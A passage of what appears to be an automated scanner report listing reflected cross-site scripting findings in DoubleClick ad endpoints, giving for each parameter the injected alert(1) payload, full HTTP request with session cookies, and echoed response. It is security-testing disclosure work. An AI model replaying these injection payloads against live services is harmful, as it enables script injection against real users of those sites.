Cache-Control: private, x-gzip-ok=""
Content-Length: 7121

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdh
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f26"-alert(1)-"730d1c99e22 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6560

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
JobMapFree_YahooTax_954x60.jpg";
var minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954
...[SNIP]...

5.7. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c10f"-alert(1)-"a01146a9b07 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs
...[SNIP]...

5.8. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4995c"-alert(1)-"15005a1e215 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6560

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
;
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/j
...[SNIP]...

5.9. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d7f"-alert(1)-"cc146351d59 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs%3D%3fhttp
...[SNIP]...

5.10. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b59f2"-alert(1)-"a445a26e2b7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6560

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
60.jpg";
var minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/
...[SNIP]...

5.11. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d1cb"-alert(1)-"68a2a9ab89b was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:40:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Scroll_FREE_N_954x60.jpg";
var minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B
...[SNIP]...

5.12. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 121f1"-alert(1)-"a54ea376143 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6560
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:41:19 GMT
Expires: Tue, 26 Apr 2011 18:41:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/job_map_f?cid=
...[SNIP]...

5.13. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1ecf"-alert(1)-"c71a3ff6507 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:39:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6560

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7/TT_CoreGPS_JobMapFree_YahooTax_954x60.jpg";
var minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B6243129
...[SNIP]...

5.14. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b7d"-alert(1)-"d594f3953b8 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=843190458b7d"-alert(1)-"d594f3953b8&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=843190458b7d"-alert(1)-"d594f3953b8&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/y%3B238055145%3B0-0%3B0%3B60965164%3B4307-300/25
...[SNIP]...

5.15. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cce8"-alert(1)-"9bf53ef1aeb was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=5711655104cce8"-alert(1)-"9bf53ef1aeb&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:42:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
) ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=5711655104cce8"-alert(1)-"9bf53ef1aeb&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/g%3B238055498%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093370/41111157/2%3B%3B%7Esscs
...[SNIP]...

5.16. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84d99"-alert(1)-"61719917f50 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e84d99"-alert(1)-"61719917f50&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:42:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e84d99"-alert(1)-"61719917f50&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/y%3B238055145%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093361/41111148/2%3B%3B%7Esscs%3D%3f";
this.clickN = "0";

...[SNIP]...

5.17. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54eb3"-alert(1)-"db1f9ed8dee was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR54eb3"-alert(1)-"db1f9ed8dee&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
